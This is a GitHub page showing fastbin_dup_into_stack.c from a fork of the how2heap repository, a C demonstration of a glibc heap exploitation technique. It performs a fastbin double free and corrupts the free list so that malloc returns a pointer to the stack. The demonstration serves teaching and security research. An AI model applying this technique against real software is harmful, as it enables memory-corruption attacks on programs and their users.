forked from shellphish/how2heap
-
Notifications
You must be signed in to change notification settings - Fork 1
/
fastbin_dup_into_stack.c
51 lines (38 loc) · 1.7 KB
/
fastbin_dup_into_stack.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#include <stdio.h>
#include <stdlib.h>
int main()
{
printf("This file extends on fastbin_dup.c by tricking malloc into\n"
"returning a pointer to a controlled location (in this case, the stack).\n");
unsigned long long stack_var;
printf("The address we want malloc() to return is %p.\n", 8+(char *)&stack_var);
printf("Allocating 3 buffers.\n");
int *a = malloc(8);
int *b = malloc(8);
int *c = malloc(8);
printf("1st malloc(8): %p\n", a);
printf("2nd malloc(8): %p\n", b);
printf("3rd malloc(8): %p\n", c);
printf("Freeing the first one...\n");
free(a);
printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
// free(a);
printf("So, instead, we'll free %p.\n", b);
free(b);
printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
free(a);
printf("Now the free list has [ %p, %p, %p ]. We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
unsigned long long *d = malloc(8);
printf("1st malloc(8): %p\n", d);
printf("2nd malloc(8): %p\n", malloc(8));
printf("Now the free list has [ %p ].\n", a);
printf("Now, we have access to %p while it remains at the head of the free list.\n"
"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
"so that malloc will think there is a free chunk there and agree to\n"
"return a pointer to it.\n", a);
stack_var = 0x20;
printf("Now, we overwrite the first 8 bytes of the data at %p to point right after the 0x20.\n", a);
*d = (unsigned long long) (((char*)&stack_var) - sizeof(d));
printf("3rd malloc(8): %p, putting the stack address on the free list\n", malloc(8));
printf("4rd malloc(8): %p\n", malloc(8));
}